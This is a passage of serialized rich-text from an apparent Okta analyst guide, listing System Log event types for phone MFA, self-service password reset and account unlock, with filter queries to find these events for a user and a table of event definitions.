\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"enrolling\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" the Phone MFA factor/authenticator in SMS mode, this event is fired after Okta sends the message containing the OTP code by 
SMS.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.sms.send_factor_verify_message\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When authenticating with the Phone MFA factor/authenticator in SMS mode, this event is fired after Okta sends the message containing the OTP code by SMS.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.voice.send_mfa_challenge_call\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"enrolling\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Phone MFA factor/authenticator in Voice Call mode, this event is fired after Okta sends the message containing the OTP code in a voice call.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.voice.send_phone_verification_call\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When authenticating with the Phone MFA factor/authenticator in Voice Call mode, this event is fired after Okta sends the message containing the OTP code in a voice 
call.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Review Password Reset and Account Lockout Events\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Self-Service Password Reset\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If your organization uses Okta Classic Engine (OCE) and supports user-initiated (\\\"self-service\\\") password resets, an analyst should expect to see the following sequence of events:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Order\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the 
following:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.email.password_reset.sent_message\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.sms.send_password_reset_message\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.voice.send_password_reset_call\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NB: Administrators using Okta Identity Engine can initiate recovery flows with Okta Verify, Email or SMS, and perform additional verification via any authenticator the user is enrolled in.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These events are fired after an email, SMS message or voice call is sent to the user to initiate the SSPR flow.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.account.reset_password\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This event is fired after Okta resets the user's password, once the email, SMS message or voice call is verified. 
The user’s password is reset to allow the user to change it.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.account.update_password\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This event is fired after the user has successfully changed their password.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once a user completes the SSPR, they commence a normal Okta sign-on flow. 
See the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"#signin\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sign in to Okta\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" section for information about those events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Below is a query analysts using OCE can use to search for SSPR-related activity in Okta System Log:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"(actor.id eq \\\"<enter user id>\\\" or target.id eq \\\"<enter user id>\\\") and (\\n(eventType eq \\\"system.email.password_reset.sent_message\\\") or\\n(eventType eq \\\"system.sms.send_password_reset_message\\\") or\\n(eventType eq \\\"system.voice.send_password_reset_call\\\") or\\n(eventType eq \\\"system.push.send_factor_verify_push\\\") or\\n(eventType eq \\\"system.email.send_factor_verify_message\\\") or\\n(eventType eq \\\"system.sms.send_factor_verify_message\\\") or\\n(eventType eq \\\"system.sms.send_phone_verification_message\\\") or\\n(eventType eq \\\"system.voice.send_mfa_challenge_call\\\") or\\n(eventType eq \\\"system.voice.send_phone_verification_call\\\") or\\n(eventType eq \\\"user.authentication.auth_via_mfa\\\") or\\n(eventType eq \\\"user.account.reset_password\\\") or\\n(eventType eq \\\"user.account.update_password\\\")\\n)\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Self-Service Account Unlock\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If an organization using Okta Classic Engine (OCE) allows self-service account unlock (SSU), an analyst should expect to see the following sequence of 
events:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Order\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the following:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.email.account_unlock.sent_message\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.sms.send_account_unlock_message\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.voice.send_account_unlock_call\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NB: Administrators using Okta Identity Engine can initiate recovery flows with Okta Verify, Email or SMS, and perform additional verification via any authenticator the user is enrolled 
in.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These events are fired after the email, SMS message or voice call is sent to the user to initiate the SSU flow.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.account.unlock_token\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This event is fired after Okta grants a recovery token to the user. The recovery token is used as part of the request that verifies the user’s security question.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.account.unlock\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This event is fired after the user has successfully unlocked their account.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Below is a query analysts using OCE can use to search for self-service unlock activity in Okta System 
Log:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"(actor.id eq \\\"<enter user id>\\\" or target.id eq \\\"<enter user id>\\\") and (\\n(eventType eq \\\"system.email.account_unlock.sent_message\\\") or\\n(eventType eq \\\"system.sms.send_account_unlock_message\\\") or\\n(eventType eq \\\"system.voice.send_account_unlock_call\\\") or\\n(eventType eq \\\"system.push.send_factor_verify_push\\\") or\\n(eventType eq \\\"system.email.send_factor_verify_message\\\") or\\n(eventType eq \\\"system.sms.send_factor_verify_message\\\") or\\n(eventType eq \\\"system.sms.send_phone_verification_message\\\") or\\n(eventType eq \\\"system.voice.send_mfa_challenge_call\\\") or\\n(eventType eq \\\"system.voice.send_phone_verification_call\\\") or\\n(eventType eq \\\"user.authentication.auth_via_mfa\\\") or\\n(eventType eq \\\"user.account.unlock_token\\\") or\\n(eventType eq \\\"user.account.unlock\\\")\\n)\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Definitions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"actor.id\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\
":\"The actor that performed an event on a target (typically a user)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"application.policy.sign_on.deny_access\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A user was denied access to an application.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"policy.evaluate_sign_on\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Provides context on the values that are used and evaluated in the context of the Global Session Policy.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.email.account_unlock.sent_message\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta sends a system-generated account unlock email to the user when they request account unlocking. 
\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.email.password_reset.sent_message\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta sends a system-generated password reset email to the user when they request a password reset. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.email.send_factor_verify_message\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta sends a system-generated verification email to the user when they sign in.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.push.send_factor_verify_push\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta sends a push notification to the user.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.sms.send_account_unlock_message\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta 
sends a system-generated account unlock text message to the user when they request account unlocking. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.sms.send_factor_verify_message\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta sends a system-generated verification text message to the user when they sign in.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.sms.send_password_reset_message\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta sends a system-generated password reset text message to the user when they request a password reset.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.sms.send_phone_verification_message\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta sends a system-generated one-time password text message to the user when they select the Phone authenticator and the SMS 
mode.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.voice.send_account_unlock_call\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta triggers a phone call to the user containing a one-time password when they request account unlocking.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.voice.send_mfa_challenge_call\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta triggers a phone call to the user containing a one-time password when they select the Phone authenticator and the Voice mode.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.voice.send_password_reset_call\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta triggers a phone call to the user containing a one-time password when they request a password 
reset.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.voice.send_phone_verification_call\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta triggers a phone call to the user containing a one-time password when they select the Phone authenticator and the Voice mode.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.account.reset_password\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The user reset their password.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.account.unlock\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The user’s account was unlocked.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.account.unlock_token\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A token was issued for unlocking the user’s 
account.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.account.update_password\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The user updated their password.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.authentication.auth_via_mfa\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The user responded to an authentication challenge with a multifactor authentication method.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.authentication.sso\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A user attempts a Single Sign-On (SSO) to an application managed in Okta. 
This event doesn't capture whether the SSO attempt is successful or has failed, as Okta can't collect the subsequent authentication attempt status from the third-party service.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.authentication.verify\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The user was successfully verified.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.mfa.factor.activate\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An MFA factor/authenticator was activated for a user.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.session.start\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta issues a session to a user who is authenticating.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More information\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For more 
information about the System Log, see the online help for your version of Okta:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Reports/Reports_SysLog.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Classic Engine\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Reports/Reports_SysLog.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity 